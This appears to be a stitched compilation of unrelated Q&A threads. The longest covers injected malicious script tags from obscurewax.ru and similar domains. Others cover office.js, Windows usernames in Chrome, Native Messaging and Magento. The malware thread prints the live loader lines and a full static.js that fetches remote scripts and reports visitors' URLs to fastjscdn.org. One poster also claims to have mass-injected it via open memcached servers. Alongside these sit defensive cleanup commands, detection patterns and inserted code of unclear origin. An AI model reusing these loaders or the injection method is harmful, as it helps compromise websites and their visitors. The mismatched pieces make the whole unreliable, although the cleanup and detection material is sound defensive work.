I have the following code added automatically into my script...
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
at the end of each of my pages. When I view the source code of my page it shows me the above code, but when I open that file in Notepad or any editing software it shows nothing but my own script. How can I remove that script from all of my files at once?
Also, let me know why this is happening.
Edit 25-Aug:
Specific domains & entries added (below).
New domain nuttypiano.com spotted.
Edit:
Figured it out. It was definitely Filezilla siphoning off my FTP passwords.
Keep an eye on the .htaccess file and file permissions -- they seem to change to 777.
Happened to me as well. It took all the passwords from the FTP program and then changed the PHP and .js files to add the line
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
Mainly index.* files are targeted; other files targeted are *.js files.
I believe the end .js file name varies, but you can track it from the obscurewax.ru domain.
I have around 8-10 websites where this has happened. Most of my websites are running Joomla.
From what I have observed so far, it likes to target the files that start with the word index.
In a Joomla install, there were about 122 files affected by this; almost all were in the joomla_install/administrator folder.
It's a pain to download a Joomla install from the server because it's somewhere around 4-5 thousand files. Still, the strategy I am following is this.
Download the entire site into a folder, run a text search (I am using TextCrawler) for:
obscurewax.ru
Note the number of files and folders that have this and, more importantly, note all the variations of the .js file names.
Do a search and replace for all the .js file variations, e.g.:
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">
In the .js files you will also find this type of code:
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files
Replace all with nothing ('').
Another thing you can do is replace obscurewax.ru with example.com.
I don't have a quick and easy way to remove the code in the comments below it (which I think they are using for tracking purposes) -- but I think if you remove the script link, that comment is not going to hurt you.
Different domains spotted:
nuttypiano.com (spotted 25-Aug)
pocketbloke.ru
yumeye.ru
microlightning.ru
riotassistance.ru
// Denis125 <webmaster#atlant.ru> (comment in a .js file.)
Specific lines to look out for:
<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster#atlant.ru>
// Author: Andrei Blagorazumov, a#fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');
Note: Sometimes you will not be able to see this link in your HTML source, but the file still gets loaded because it's hiding in one of the JavaScript files. A good way to be sure you are really clean is to actually go in and see the .js files that are getting loaded while your page is loading and check if any .js files are loading from the suspected domain. An easy way to do this is to go into the developer tools in Chrome (Ctrl + Shift + I).
Here in the Resources tab you will see the Scripts filter; using this you can track all the .js files loading while your page loads. The Firebug plugin in Firefox will also let you see this info. If your website has several parts (front-end, back-end), you want to visit all the parts of the website and check if any suspicious .js files are getting loaded.
Very importantly:
Update your antivirus scanner and do a full scan of your computer for viruses.
If you are using an FTP program or your code editor has FTP capability, you want to visit all the websites for which you have passwords stored and check if they were affected. If your FTP program/editor was compromised -- almost all the websites that you have FTP passwords stored for would have been affected.
Change the passwords for all the FTP accounts that were stored in the programs.
Uninstall the suspect program & use another one, or re-download and install it.
This is the worst thing that can happen to a web developer. This attack is generally done by tricking the victim (you and me) into believing there is an update for the FTP program from within the program; as soon as you install the update -- your sites will get affected.
I am working on this thing right now. If you have any better/shorter ways of doing this, please share. Thanks!
I have a client's site that got hacked with a line of code from obscurewax.ru. The site is hosted on GoDaddy shared hosting. It looks like they edited multiple files yesterday on the server.
We are not sure how they entered the website, but they did crash the website. We are right now going in and deleting everything to start over, as we are unsure of where they left files.
They left this line of code - obscurewax.ru/Heat_Sink.js
Which does nothing, but I am not taking any chances. According to WHOIS, the domain was purchased just three days ago and the info is private. If it was the hosting provider it would be public. It's being hosted in Russia and on US websites; I see that as a red flag. I think they are building their network and will activate the scripts once they have a big enough footprint.
Hope that helps.
Who is your hosting provider? Some hosts do insert code (normally ad banners for free sites, but not always) to your web page on-the-fly. If you do have such a host, I recommend getting a different one.
Never attribute to a virus what may be due to a free webhost ;)
Is that actually the URL of the script being inserted in your pages? Because that's an empty file.
Hmmm.. It seems that it is a proftpd 0-day.
A pair of clients reported the problem on their sites.
There was proftpd 1.3.1 installed on the server.
According to the log files, attackers were brute-forcing only login names, not passwords.
After successfully guessing the login name (from the site's domain name, for example) they had no problem logging in...
Bad thing; I hope upgrading to 1.3.3 will fix it.
If you are running a Linux server, here are two quick console snippets to fix sites after the obscurewax attack:
cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \;
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;
Don't forget to replace Google.js with your variant of the attacker's link.
UPDATE
The proftpd is clean. After some investigation I've found the real reason, and it is just prosaic. One of the lead hosting managers was keeping the logins/passwords of many FTP users in his Filezilla on his Windows desktop. All the passwords that he kept were stolen by a third party.
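A scanner for the two loader shapes quoted in this thread (the bare <script src="http://domain/Name.js"> tag with its trailing hex comment, and the split-string document.write variant), written here as an added example rather than code from any of the posts; it does the job of the TextCrawler search-and-replace and the sed one-liners above for every domain the thread lists without hard-coding one split point or one .js file name. The domain list, the file suffixes and the two sample inputs are assumptions.

```python
import re
import sys
from pathlib import Path

# Domains named in this thread; add any new one you spot.
SUSPECT_DOMAINS = (
    "obscurewax.ru", "nuttypiano.com", "pocketbloke.ru",
    "yumeye.ru", "microlightning.ru", "riotassistance.ru",
)
DOMAIN_RE = "|".join(re.escape(d) for d in SUSPECT_DOMAINS)

# Shape 1: a plain <script src="http://<domain>/Name.js"> tag, with or without its
# closing tag, optionally followed by the 32-hex-digit tracking comment.
TAG_RE = re.compile(
    r'<script\b[^>]*\bsrc="https?://(?P<domain>' + DOMAIN_RE + r')/(?P<file>[^"]*)"[^>]*>'
    r'(?:\s*</script>)?(?:\s*<!--[0-9a-f]{32}-->)?',
    re.IGNORECASE,
)
# Shape 2: document.write('<s'+'cript ... src="http://<domain>/Name.js"></scr'+'ipt>');
# The word "script" is split at a different point in each sample, so capture the whole
# concatenation of single-quoted pieces and inspect the joined value instead of
# hard-coding one split.
WRITE_RE = re.compile(r"document\.write\(\s*((?:'[^']*'\s*\+\s*)*'[^']*')\s*\);?")
SRC_RE = re.compile(r'src="https?://(' + DOMAIN_RE + r')/([^"]*)"', re.IGNORECASE)

# Constructed samples in the two shapes quoted in the thread.
SAMPLE_HTML = ('<p>hello</p>\n<script type="text/javascript" '
               'src="http://obscurewax.ru/Kilobyte.js"></script>\n'
               '<!--72628eb2e686638651ad69b6a34a630f-->\n')
SAMPLE_JS = ("var x=1;document.write('<sc'+'ript type=\"text/javascript\" "
             "src=\"http://pocketbloke.ru/Undo.js\"></scri'+'pt>');\nvar y=2;")


def joined_literal(expr):
    """Concatenate the pieces of 'a'+'b'+'c' the way the JS engine would."""
    return "".join(re.findall(r"'([^']*)'", expr))


def find_injections(text):
    """Return [(start, end, domain, filename)] for every injected loader in text."""
    hits = []
    for m in TAG_RE.finditer(text):
        hits.append((m.start(), m.end(), m.group("domain").lower(), m.group("file")))
    for m in WRITE_RE.finditer(text):
        src = SRC_RE.search(joined_literal(m.group(1)))
        if src:
            hits.append((m.start(), m.end(), src.group(1).lower(), src.group(2)))
    return sorted(hits)


def clean(text):
    """Cut every injection out; returns (cleaned_text, [(domain, filename), ...])."""
    hits = find_injections(text)
    for start, end, _, _ in reversed(hits):  # cut from the back so offsets stay valid
        text = text[:start] + text[end:]
    return text, [(d, f) for _, _, d, f in hits]


def scan_tree(root, write=False, suffixes=(".html", ".htm", ".php", ".js")):
    """Walk a downloaded web root and report (path, domain, filename) per hit.
    Only text-like suffixes are touched, so binaries are never rewritten.
    With write=True the cleaned content is written back in place."""
    report = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, removed = clean(original)
        report.extend((str(path), d, f) for d, f in removed)
        if write and removed:
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report


if __name__ == "__main__":
    # usage: python scan.py <downloaded-webroot> [--fix]; no argument runs the samples
    if len(sys.argv) > 1:
        for path, domain, filename in scan_tree(sys.argv[1], write="--fix" in sys.argv[2:]):
            print(f"{path}: {domain}/{filename}")
    else:
        for sample in (SAMPLE_HTML, SAMPLE_JS):
            print(clean(sample))
```

Run it without --fix first and compare the report against the file timestamps; the list of domain/filename pairs it prints is the set of variants you would otherwise collect by hand.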
I got the same problem on my website. They altered all .js files and added that line of code at the end.
The problem is that I can't find how they did it.
Could this be any components/plugins that are not updated, perhaps?
How about we make a list of our components to see if we have some that are the same and maybe the cause of this hack?
My list is (components):
Attachments
Banners Enabled 1.5.0 April 2006 Joomla! Project
CSV Improved Enabled 1.7 22 May 2009 RolandD Cyber Produksi
CSVI VirtueMart Enabled 2.0.1 28 November 2009 RolandD Cyber Produksi
docman Enabled 1.4.0.stable February 2009 Joomlatools
Easy Search Enabled 0.1.0 November 2008 Hiro Nozu
easysql Enabled 1.27 30/11/2006 Serebro
FrontpagePlus Disabled 0.1.0 January 2009 NoNumber! (Peter van Westen)
gk3_tabs_manager Disabled 3.0.2 31/05/2009 Gavick.com
JCE Enabled 157 23 June 2009 Ryan Demmer
JCrawler Enabled 1.7 Beta 20/4/2009 Patrick Winkler
JoomlaPack Enabled 2.4 2009-12-05 JoomlaPack Developers
K2 Enabled 2.1 September 9th, 2009 JoomlaWorks
Linkr Enabled 2.3.6 April 2008 Frank
Newsfeeds Enabled 1.5.0 April 2006 Joomla! Project
Polls Enabled 1.5.0 July 2004 Joomla! Project
Nova Enabled 1.7.5 February 2010 ProJoom
pjinstaller Enabled 1.0.8 January 2010 ProJoom
QContacts Disabled 1.0.3 July 2008 Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker Enabled 1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER Enabled 1.10 21/01/2010 Redweb.dk
RokCandy Disabled 0.82a January 31, 2009 RocketWerx, LLC
RokModule Enabled 1.1 June 2008 RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller Enabled 1.0.0 04/06/2009 www.rsjoomla.com
sh404sef Enabled 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
VirtueMart Enabled 1.1.4 16.10.2009 The VirtueMart Development Team
vmemails Enabled 1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks Enabled 1.5.0 April 2006 Joomla! Project
Xmap
Note: 2 months ago I did a complete cleanup of my PC and changed all passwords on the server and website. This only worked until now, when the virus is back, so my very good guess is that it's a component, module or plugin that is doing the damage. Yes, you can do all the virus cleanup you want, but the issue will return!
I just stumbled on this; oops, it is quite a recent incident here. I thought that my site was the only one. I noticed that this script was always loading whenever I accessed my site; I was running a CMS but now I have shut it down. As for the suggestion of the vulnerability within FTP, count me out of this since I have never used FTP. I simply shut down the CMS section because even after running a fresh install of the latest release of the CMS another malicious script was still loading while accessing the site. That made me come to the conclusion that my web host's servers may have been compromised already. Other malicious scripts that had attacked my CMS include:
pocketbloke.ru
yumeye.ru, and
microlightning.ru
P.S: My .htaccess file was also altered and the file permissions to my CMS were all turned to 777. Could this be a cPanel vulnerability being exploited by these hackers?
Start by changing FTP or any other remote access passwords and checking your computer/server for viruses. Something/someone is adding this automatically to all your files. Then you can use any mass text replacement tool like http://tools.tortoisesvn.net/grepWin to find that line in all files and remove it (by replacing it with an empty line).
UPDATE
I missed your line about not seeing that line in your files' source. Just check the rest of the file and check all JS files - they should include a small portion of minified code which adds that line. You can also try to search all your files locally, or use any browser's developer tools to find where the same URL or part of it is mentioned.
Weird. I got the same thing in one of my clients' index.html with a bunch of other mysterious files. Perhaps they got into his FTP. Of my 50 other clients, no one else was affected, it seems.
Upon inspection, random users have been able to access the FTP for a while. Here is the unique list of IPs that I know aren't the owner's:
Looks like some sort of mass attack. I would look at the timestamps on the files that were modified and see if any are close, or if any of your other FTP people have logged in with those IPs. Just to note, I am running a Debian Linux server with proftpd...
I got a weird error message when trying to edit the file in WinSCP using Notepad2... so it looks like whatever code it is, it's messing up typical text editors. I was able to nano the file and delete the links though.
PS: I was made aware of this when google emailed me "Dear site owner or webmaster of [censored].com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com."
Detected the same problem today. I deleted all the strings from the JS manually.
They're getting smarter.
My string was:
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');
Malware infects a PC with stored FTP passwords. It then automatically takes the passwords, logs in and infects the website. Look for 2 recently modified files in c:\windows\system32\drivers
They are probably the culprits.
Here is the script found on my website by Google. Google had blocked my site because of "Malware".
I was trying WordPress and a theme that I paid for, "The Local". This, in my opinion, is the only path by which this script could have been added. I removed all scripts of WordPress and The Local, and now Google does not detect malware on my site.
My solution was deletion of all the scripts that I mentioned and replacing everything with standard HTML. The other scripts were mostly all PHP, and I find HTML to be much more stable.
Good Luck
In my WordPress site, I have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the malicious JS code was hosted on the domain name "asmr9999 .live". Since a few days ago, the domain has changed to "fastjscdn .org".
How is it possible? How can it change the domain where it is hosted?
I am sure that WordPress, themes and plugins do not contain the malicious code. I didn't find anything in the database, also in base64 encoding, for now.
Also, what does the code in the JS file do to my site?
I also found other people with the same malware as me, in a custom CMS; we cannot solve the problem in any way. More info here
It may be late, but let me tell the truth. The problem is the Memcached server you are using, which is public and has no password on the network. I made a script scanning the network and injecting this malicious code into every memcached server. It's a "cache-side" XSS attack. Your server is safe. Configure your firewall and block connections from outside to port 11211, and everything will be OK.
You can use an online JavaScript beautifier tool to check the content of static.js: it seems to be injecting a script adapted to the platform, probably the same one that you mentioned in your other question, which will trigger the download of malware/adware.
The reason why it could change the domain in the script is probably that your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one.
As this answer suggested, I want to modify office.js a little bit.
So I copied the content of https://appsforoffice.microsoft.com/lib/1/hosted/office.js to local, such that https://localhost:3000/static/office.js shows well the content.
Then, I make a very simple file test.html:
<html>
<head>
<!--<script src="https://appsforoffice.microsoft.com/lib/1/hosted/office.js"></script>-->
<script type="text/javascript" src="https://localhost:3000/static/office.js"></script>
</head>
<body>
haha
</body>
</html>
Loading https://localhost:3000/static/test.html with the remote office.js in a browser shows Warning: Office.js is loaded outside of Office client o15apptofilemappingtable.js:11, and loading it in an Office add-in works well.
However, loading https://localhost:3000/static/test.html with the local office.js in a browser shows Uncaught SyntaxError: Unexpected token < o15apptofilemappingtable.js:1, and loading it in an Office add-in gives an error: Add-in Error Something went wrong and we couldn't start this add-in. Please try again later or contact your system administrator.
So does anyone know what's wrong here? Is it possible to make our own local version of office.js?
See my answer in the linked question. Essentially, no, you should not be making your own local copy of "office.js". But if you did want a local copy -- which we already offer on NuGet and, more recently, on NPM (https://www.npmjs.com/package/@microsoft/office-js) -- you would need all the associated files in that directory as well, not just Office.js itself.
See https://unpkg.com/@microsoft/office-js@1.1.1/dist/ for a listing of the files and folders that make up Office.js. Not all (in fact, not most) are used in any given session, but you do want the whole set of files since different ones are loaded in different circumstances.
I have Apache installed on a Windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Windows users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create an index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the context of the user, and not as a service. If you try the example, if you get something like SYSTEM or IUSR_MACHINE instead of the user name, you'll need to adjust.
You have 2 choices, as far as I see.
1) You may ask users to identify themselves the first time they use the page and store it in local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host that gets the user credentials from the system and returns them on a GET request.
So I wrote a question here earlier about opening native software (browsers) in my Chrome application with PNaCl, NaCl, or NPAPI, which I guess are not allowed anymore or were never allowed, depending on which we are talking about. So a user pointed me to Native Messaging, and I am just trying to create something that will open a user's HTML file in a browser they choose.
So they have index.html and they want to test it in Firefox, Chrome, and IE so they run each one and test.
Documentation
https://developer.chrome.com/extensions/nativeMessaging
Example from Google
http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/examples/api/nativeMessaging/host/
This is my first time dealing with this stuff and I don't want to have my users go to a REGEDIT file and add it and blah blah blah. It should be simple as possible, they download my app and it's done.
Native Messaging Manifest --- (not 100% sure where to put it)
{
"name": "com.kandidesigns.kodex",
"description": "Kodex is a Chrome Application to make programming websites easier and efficient",
"path": "C:\\Program Files\\My Application\\chrome_native_messaging_host.exe",
"type": "stdio",
"allowed_origins": [
"chrome-extension://bbbgompnaiddjohgmdhmienllkjkilap/"
]
}
(On the "type" line: standard input or standard output? Not sure which one to use. JSON has no comments, so the remark is kept out of the file.)
Permissions inside the app's manifest include: "nativeMessaging"
BATCH program to run a file
@ECHO OFF
SET /p ID="Enter browser: "
SET /p URL="Enter URL: "
REM %URL% is quoted so a value containing spaces or & reaches the browser as one argument.
IF "%ID%"=="0" (START chrome "%URL%" & GOTO :EOF)
IF "%ID%"=="1" (START firefox "%URL%" & GOTO :EOF)
IF "%ID%"=="2" (START edge "%URL%" & GOTO :EOF)
IF "%ID%"=="3" (START iexplore "%URL%" & GOTO :EOF)
IF "%ID%"=="4" (START safari "%URL%" & GOTO :EOF)
REM A bare ELSE on its own line is not valid batch syntax; fall through instead.
ECHO No browser found by that classification
Never wrote a bat file to figure out where to go and what to open etc... Here is another tutorial I've watched, which is very low and pathetic, sorry.
https://www.youtube.com/watch?v=H82-9hg1Plg
Anyway, if someone could lead me the right way and assist on this, it would be greatly appreciated.
The manifest file they are referring to is an independent file, not to be confused with your application manifest. Just declare a new JSON file and introduce the code for the manifest (in the documentation, the file is named nmh-manifest.json). The file can be located anywhere in the file system, but you'll need to describe the full path.
Here is a reference for a demo app implementing Native Messaging: https://chromium.googlesource.com/chromium/src/+/master/chrome/common/extensions/docs/examples/api/nativeMessaging
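A minimal native messaging host in Python, added here as an example (it is neither Google's sample host nor the asker's project): it speaks the stdio framing the linked documentation describes (a 4-byte length in native byte order, then the UTF-8 JSON body) and, before starting anything, checks the requested browser against an allow-list and the URL against permitted schemes, handing the URL to the browser as a single argument instead of through a shell. The executable paths, the {"browser", "url"} message shape and the sample request are assumptions.

```python
import json
import struct
import subprocess
import sys
from urllib.parse import urlparse

# Browser ids the app may send, mapped to the executable to start. These paths are
# assumptions for illustration; point them at whatever is actually installed.
BROWSERS = {
    "chrome": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    "firefox": r"C:\Program Files\Mozilla Firefox\firefox.exe",
}
ALLOWED_SCHEMES = {"http", "https", "file"}

# Constructed request, as the app would send it over the stdio channel.
SAMPLE_REQUEST = {"browser": "firefox", "url": "file:///C:/site/index.html"}


def encode(obj):
    """Frame one message the way the protocol requires:
    a 4-byte length in native byte order followed by the UTF-8 JSON body."""
    body = json.dumps(obj).encode("utf-8")
    return struct.pack("@I", len(body)) + body


def decode(data):
    """Parse one frame from the front of data; returns (message, remaining bytes)."""
    if len(data) < 4:
        raise ValueError("truncated frame header")
    (length,) = struct.unpack("@I", data[:4])
    if len(data) < 4 + length:
        raise ValueError("truncated frame body")
    return json.loads(data[4:4 + length].decode("utf-8")), data[4 + length:]


def read_message(stream):
    """Read one frame from a binary stream; None when the browser closes the pipe."""
    header = stream.read(4)
    if len(header) < 4:
        return None
    (length,) = struct.unpack("@I", header)
    return decode(header + stream.read(length))[0]


def handle_request(request, launch=subprocess.Popen):
    """Validate {"browser": id, "url": u} and start the browser.
    The id must be in the allow-list and the url must parse as http(s) or file; the
    url is passed as a single argv element, never through cmd.exe, so characters
    such as & or | inside it cannot chain extra commands. Returns the reply frame."""
    browser = request.get("browser")
    if browser not in BROWSERS:
        return {"ok": False, "error": f"no browser registered for id {browser!r}"}
    url = str(request.get("url", ""))
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or (parts.scheme != "file" and not parts.netloc):
        return {"ok": False, "error": f"refusing to open {url!r}"}
    argv = [BROWSERS[browser], url]
    launch(argv)
    return {"ok": True, "argv": argv}


def serve(stdin=None, stdout=None):
    """Host main loop: one reply frame per request frame until EOF on stdin."""
    stdin = stdin or sys.stdin.buffer
    stdout = stdout or sys.stdout.buffer
    while True:
        request = read_message(stdin)
        if request is None:
            break
        stdout.write(encode(handle_request(request)))
        stdout.flush()


if __name__ == "__main__":
    serve()
```

Chrome only launches this host for the extension ids listed in the manifest's allowed_origins, so the allow-list inside the host guards what that extension may ask for, not who may talk to it.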
I cloned an existing Magento 1.7.2 installation on the same server with a test subdomain. The frontend seems to work, and I can log in to the admin. The admin menu doesn't work, however: no dropdowns, and copying URL paths doesn't work either. I've searched online, and most answers date back to 2008 and suggest that it's a permissions issue. So I've changed the permissions of folders and files to 755 and 644, but still no working menus. The cache (var/cache) is empty.
These menus are JavaScript generated. The following error message is from the console:
Error: TypeError: Element.addClassName is not a function
To be clear - the solution is not in JavaScript, but it's something on the server. This install works on the same server in another directory with another domain.
Any ideas how to fix this?
The error
Error: TypeError: Element.addClassName is not a function
indicates some JavaScript on your page can't call the addClassName method.
The addClassName method is added to Element via the Prototype JavaScript framework.
That means it's very likely your browser can't download the prototype.js file. Since it can't download this file, the addClassName method is never defined, and you get the error you're seeing.
Look at the source code of your admin pages and find the script tag that includes the version of Prototype shipped with your version of Magento.
<script type="text/javascript" src="http://magento.example.com/js/prototype/prototype.js"></script>
Take the URL from this script tag and load it in your browser.
My guess is you'll get a 404 because the file is missing, or a forbidden error because the file has incorrect permissions, or some other web server error that prevents the file from being shown. It's also possible that the link is pointing to an older domain name that's based on a value configured or cached in Magento.
Track down the source of that problem, and you'll be good to go.
Another reason could be that the skin and CSS rules are not correct for your environment.
I've just moved a site from live to local, and the skin/css/media were configured to a subdomain, so I looked in the core_config_data table and updated the URLs.
Please check if you have set merge JS or CSS to yes; you can update this via the DB if you can't do it via the menu:
SELECT * FROM core_config_data WHERE path LIKE 'dev%'
Change merge_css and merge_js from 1 to 0.
In my case I changed the permissions of the folder and, recursively, its files and subfolders, and it started working. Try it once.